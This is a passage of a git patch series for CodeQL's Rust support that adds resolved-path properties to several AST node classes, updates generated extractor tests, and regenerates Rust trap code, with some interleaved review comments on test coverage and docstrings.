diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql similarity index 91% rename from rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql rename to rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql index c998981364f..7ed41155d77 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql @@ -2,6 +2,6 @@ import codeql.rust.elements import TestUtils -from Path x +from PathPat x where toBeTested(x) and not x.isUnknown() select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql similarity index 91% rename from rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.ql rename to rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql index c8969309836..cbe1932925a 100644 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.ql +++ b/rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql @@ -2,6 +2,6 @@ import codeql.rust.elements import TestUtils -from Path x +from PathPat x where toBeTested(x) and not x.isUnknown() select x, x.getResolvedPath() 
diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected deleted file mode 100644 index df80e22f744..00000000000 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected +++ /dev/null @@ -1,2 +0,0 @@ -| gen_path_type.rs:5:14:5:29 | ...::collections | lang:std | -| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | lang:std | diff --git a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected deleted file mode 100644 index 7d1c698b0ce..00000000000 --- a/rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected +++ /dev/null @@ -1,2 +0,0 @@ -| gen_path_type.rs:5:14:5:29 | ...::collections | crate::collections | -| gen_path_type.rs:5:14:5:48 | ...::HashMap::<...> | crate::collections::hash::map::HashMap | diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected index 445b906bf88..90cc595d61e 100644 --- a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.expected 
@@ -1,4 +1,4 @@ -| gen_record_expr.rs:5:17:5:34 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | -| gen_record_expr.rs:6:18:6:38 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | -| gen_record_expr.rs:7:5:7:22 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | -| gen_record_expr.rs:8:5:8:14 | Foo {...} | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:5:17:5:34 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:6:18:6:38 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:7:5:7:22 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | +| gen_record_expr.rs:8:5:8:14 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordExprFieldList: | yes | diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql index 41cd6a41c4b..56c14f27dfd 100644 --- a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr.ql 
@@ -2,12 +2,21 @@ import codeql.rust.elements import TestUtils -from RecordExpr x, string hasPath, string hasRecordExprFieldList +from + RecordExpr x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + string hasRecordExprFieldList where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and (if x.hasPath() then hasPath = "yes" else hasPath = "no") and if x.hasRecordExprFieldList() then hasRecordExprFieldList = "yes" else hasRecordExprFieldList = "no" -select x, "hasPath:", hasPath, "hasRecordExprFieldList:", hasRecordExprFieldList +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "hasPath:", hasPath, "hasRecordExprFieldList:", hasRecordExprFieldList diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..25635cb050f --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d 
diff --git a/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql new file mode 100644 index 00000000000..0f3230f3314 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordExpr x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected index 8d7f96229ad..9b996be2368 100644 --- a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.expected @@ -1,2 +1,2 @@ -| gen_record_pat.rs:6:9:6:26 | Foo {...} | hasPath: | yes | hasRecordPatFieldList: | yes | -| gen_record_pat.rs:7:9:7:18 | Foo {...} | hasPath: | yes | hasRecordPatFieldList: | yes | +| gen_record_pat.rs:6:9:6:26 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordPatFieldList: | yes | +| gen_record_pat.rs:7:9:7:18 | Foo {...} | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | hasRecordPatFieldList: | yes | diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql index 19bc5ea6e3a..3b079777306 100644 --- a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat.ql 
@@ -2,10 +2,19 @@ import codeql.rust.elements import TestUtils -from RecordPat x, string hasPath, string hasRecordPatFieldList +from + RecordPat x, string hasResolvedPath, string hasResolvedCrateOrigin, string hasPath, + string hasRecordPatFieldList where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and (if x.hasPath() then hasPath = "yes" else hasPath = "no") and if x.hasRecordPatFieldList() then hasRecordPatFieldList = "yes" else hasRecordPatFieldList = "no" -select x, "hasPath:", hasPath, "hasRecordPatFieldList:", hasRecordPatFieldList +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "hasPath:", hasPath, "hasRecordPatFieldList:", hasRecordPatFieldList diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..f80865d0515 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d 
diff --git a/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql new file mode 100644 index 00000000000..a816942e47b --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from RecordPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected index a0d12cc8509..9fa41161bcb 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected @@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | getNumberOfFields: | 4 | hasPath: | yes | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | getNumberOfFields: | 2 | hasPath: | yes | -| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | getNumberOfFields: | 1 | hasPath: | yes | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 4 | hasPath: | yes | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 2 | hasPath: | yes | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | getNumberOfFields: | 1 | hasPath: | yes | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql index d12f3427df5..14ba21627af 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 
@@ -2,10 +2,19 @@ import codeql.rust.elements import TestUtils -from TupleStructPat x, int getNumberOfFields, string hasPath +from + TupleStructPat x, string hasResolvedPath, string hasResolvedCrateOrigin, int getNumberOfFields, + string hasPath where toBeTested(x) and not x.isUnknown() and + (if x.hasResolvedPath() then hasResolvedPath = "yes" else hasResolvedPath = "no") and + ( + if x.hasResolvedCrateOrigin() + then hasResolvedCrateOrigin = "yes" + else hasResolvedCrateOrigin = "no" + ) and getNumberOfFields = x.getNumberOfFields() and if x.hasPath() then hasPath = "yes" else hasPath = "no" -select x, "getNumberOfFields:", getNumberOfFields, "hasPath:", hasPath +select x, "hasResolvedPath:", hasResolvedPath, "hasResolvedCrateOrigin:", hasResolvedCrateOrigin, + "getNumberOfFields:", getNumberOfFields, "hasPath:", hasPath diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected index 5885cbcea3e..21e1a701963 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected 
@@ -1,7 +1,7 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | -| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected index 0c07d081720..34f30ed8ae1 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected 
@@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | -| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..144302946a9 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from TupleStructPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql new file mode 100644 index 00000000000..561c303d968 --- /dev/null 
+++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from TupleStructPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/schema/annotations.py b/rust/schema/annotations.py index b0d7296dbad..05a163de9bf 100644 --- a/rust/schema/annotations.py +++ b/rust/schema/annotations.py @@ -76,7 +76,7 @@ class _: ``` """ -@annotate(Path, replace_bases={AstNode: Resolvable}) +@annotate(Path) class _: """ A path. For example: @@ -114,7 +114,7 @@ class _: """ -class PathExprBase(Expr): +class PathExprBase(Expr, Resolvable): """ A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. """ @@ -412,7 +412,7 @@ class _: """ -@annotate(RecordExpr, cfg = True) +@annotate(RecordExpr, add_bases=(Resolvable,), cfg = True) class _: """ A record expression. For example: @@ -682,7 +682,7 @@ class _: """ -@annotate(RecordPat, cfg = True) +@annotate(RecordPat, add_bases=(Resolvable,), cfg = True) class _: """ A record pattern. For example: @@ -723,7 +723,7 @@ class _: """ -@annotate(PathPat, cfg = True) +@annotate(PathPat, add_bases=(Resolvable,), cfg = True) @qltest.test_with(Path) class _: """ @@ -769,7 +769,7 @@ class _: """ -@annotate(TupleStructPat, cfg = True) +@annotate(TupleStructPat, add_bases=(Resolvable,), cfg = True) class _: """ A tuple struct pattern. For example: diff --git a/rust/schema/prelude.py b/rust/schema/prelude.py index ffd65959b5a..9b9858be6a5 100644 --- a/rust/schema/prelude.py +++ b/rust/schema/prelude.py 
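Review bot: Dropping `replace_bases={AstNode: Resolvable}` from `@annotate(Path)` in the first hunk of `annotations.py` removes the only resolution results the extractor tests recorded. The deleted `Path_getResolvedPath.expected` and `Path_getResolvedCrateOrigin.expected` held the two `gen_path_type.rs` rows (`crate::collections::hash::map::HashMap`, `lang:std`), while every `*_getResolvedPath.expected` and `*_getResolvedCrateOrigin.expected` file added in this commit is created with no content and all summary rows read `hasResolvedPath: | no`. With no positive case left, a regression that stops `resolved_path` or `resolved_crate_origin` from being populated would pass the suite, and any query or source model that matches on those values would presumably return fewer results without a failing test. I would add a test case in which a `PathExpr`, `PathPat` or `RecordExpr` names a standard-library item, so that at least one of the new expected files has a non-empty row. The annotated class body continues outside the hunk.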
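Review bot: Adding `Resolvable` to the shared base in `class PathExprBase(Expr, Resolvable):` also gives the two resolution properties to format-template variable accesses, because the docstring directly below says the base covers both `PathExpr` and `FormatTemplateVariableAccess`. The other four changes in this file attach the base to one concrete class each through `add_bases=(Resolvable,)`, so this one looks broader than intended. If it is not intended, attach `Resolvable` to `PathExpr` only; if it is, say so in the docstring with a sentence such as `Both kinds carry an optional resolved path and crate origin.`. The class body continues outside the hunk.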
@@ -89,7 +89,7 @@ class Addressable(AstNode): class Resolvable(AstNode): """ - Either a `Path`, or a `MethodCallExpr`. + Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. """ resolved_path: optional[string] | rust.detach | ql.internal resolved_crate_origin: optional[string] | rust.detach | ql.internal From c46f44da5f17a6b14a36d47c978780d94e942b19 Mon Sep 17 00:00:00 2001 
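Review bot: The updated `Resolvable` docstring names only `PathExpr`, `PathPat` and `MethodCallExpr`, but the `annotations.py` hunks in this same commit also add `Resolvable` as a base of `RecordExpr`, `RecordPat` and `TupleStructPat`, and of `PathExprBase` rather than `PathExpr`. Because this text presumably ends up in the generated QL documentation, a reader would not expect `getResolvedPath()` on the record and tuple-struct nodes. I would list every subclass, ``Either a `PathExprBase`, a `PathPat`, a `RecordExpr`, a `RecordPat`, a `TupleStructPat`, or a `MethodCallExpr`.``, or describe the set instead of enumerating it so the sentence does not go stale on the next change. The class body continues outside the hunk.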
From: Paolo Tranquilli Date: Fri, 29 Nov 2024 15:55:51 +0100 Subject: [PATCH 0767/1267] Rust: fix QL compilation errors --- rust/extractor/src/generated/.generated.list | 2 +- rust/extractor/src/generated/top.rs | 675 ++++++++++-------- rust/ql/.generated.list | 49 +- rust/ql/.gitattributes | 5 +- .../internal/generated/CfgNodes.qll | 50 -- .../rust/dataflow/internal/DataFlowImpl.qll | 30 +- rust/ql/lib/codeql/rust/elements.qll | 1 + .../lib/codeql/rust/elements/PathAstNode.qll | 13 + rust/ql/lib/codeql/rust/elements/PathExpr.qll | 2 +- .../lib/codeql/rust/elements/PathExprBase.qll | 1 - rust/ql/lib/codeql/rust/elements/PathPat.qll | 3 +- .../lib/codeql/rust/elements/RecordExpr.qll | 3 +- .../ql/lib/codeql/rust/elements/RecordPat.qll | 3 +- .../lib/codeql/rust/elements/Resolvable.qll | 2 +- .../codeql/rust/elements/TupleStructPat.qll | 3 +- .../elements/internal/PathAstNodeImpl.qll | 19 + .../rust/elements/internal/ResolvableImpl.qll | 2 +- .../internal/generated/ParentChild.qll | 231 +++--- .../internal/generated/PathAstNode.qll | 36 + .../elements/internal/generated/PathExpr.qll | 19 +- .../internal/generated/PathExprBase.qll | 3 +- .../elements/internal/generated/PathPat.qll | 17 +- .../rust/elements/internal/generated/Raw.qll | 178 +++-- .../internal/generated/RecordExpr.qll | 18 +- .../elements/internal/generated/RecordPat.qll | 18 +- .../internal/generated/Resolvable.qll | 2 +- .../elements/internal/generated/Synth.qll | 60 +- .../internal/generated/TupleStructPat.qll | 20 +- .../ql/lib/codeql/rust/frameworks/Reqwest.qll | 5 +- .../lib/codeql/rust/frameworks/stdlib/Env.qll | 6 +- rust/ql/lib/rust.dbscheme | 114 ++- .../security/CWE-696/BadCtorInitialization.ql | 2 +- .../FormatTemplateVariableAccess.expected | 10 +- .../FormatTemplateVariableAccess.ql | 12 +- ...ableAccess_getResolvedCrateOrigin.expected | 0 ...teVariableAccess_getResolvedCrateOrigin.ql | 7 - ...ateVariableAccess_getResolvedPath.expected | 0 ...tTemplateVariableAccess_getResolvedPath.ql | 7 - 
.../generated/Path/PathExpr.expected | 12 +- .../generated/Path/PathExpr.ql | 10 +- .../TupleStructPat/TupleStructPat.expected | 6 +- .../TupleStructPat/TupleStructPat.ql | 10 +- .../dataflow/sources/InlineFlow.ql | 6 +- rust/schema/annotations.py | 17 +- rust/schema/prelude.py | 9 +- 45 files changed, 855 insertions(+), 843 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/elements/PathAstNode.qll create mode 100644 rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll create mode 100644 rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql diff --git a/rust/extractor/src/generated/.generated.list b/rust/extractor/src/generated/.generated.list index 8ca2c6931b1..cb1f2ee7ca5 100644 --- a/rust/extractor/src/generated/.generated.list +++ b/rust/extractor/src/generated/.generated.list @@ -1,2 +1,2 @@ mod.rs 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 -top.rs 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 +top.rs 4b7dc25409974b210c908c4a15d5b69d242c07305e6e78c9dfe0fa434c22e2bd 4b7dc25409974b210c908c4a15d5b69d242c07305e6e78c9dfe0fa434c22e2bd diff --git a/rust/extractor/src/generated/top.rs b/rust/extractor/src/generated/top.rs index 8cdec4c9b9f..3a1fc7bea67 100644 --- a/rust/extractor/src/generated/top.rs +++ b/rust/extractor/src/generated/top.rs 
@@ -6055,6 +6055,51 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct PathAstNode { + _unused: () +} + +impl trap::TrapClass for PathAstNode { + fn class_name() -> &'static str { "PathAstNode" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathExprBase { _unused: () 
@@ -6100,83 +6145,6 @@ impl From> for trap::Label { } } -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathExprBase is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -#[derive(Debug)] -pub struct PathPat { - pub id: trap::TrapId, - pub path: Option>, -} - -impl trap::TrapEntry for PathPat { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("path_pats", vec![id.into()]); - if let Some(v) = self.path { - out.add_tuple("path_pat_paths", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for PathPat { - fn class_name() -> &'static str { "PathPat" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Pat - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct PathType { pub id: trap::TrapId, 
@@ -6508,78 +6476,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct RecordExpr { - pub id: trap::TrapId, - pub path: Option>, - pub record_expr_field_list: Option>, -} - -impl trap::TrapEntry for RecordExpr { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("record_exprs", vec![id.into()]); - if let Some(v) = self.path { - out.add_tuple("record_expr_paths", vec![id.into(), v.into()]); - } - if let Some(v) = self.record_expr_field_list { - out.add_tuple("record_expr_record_expr_field_lists", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for RecordExpr { - fn class_name() -> &'static str { "RecordExpr" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: 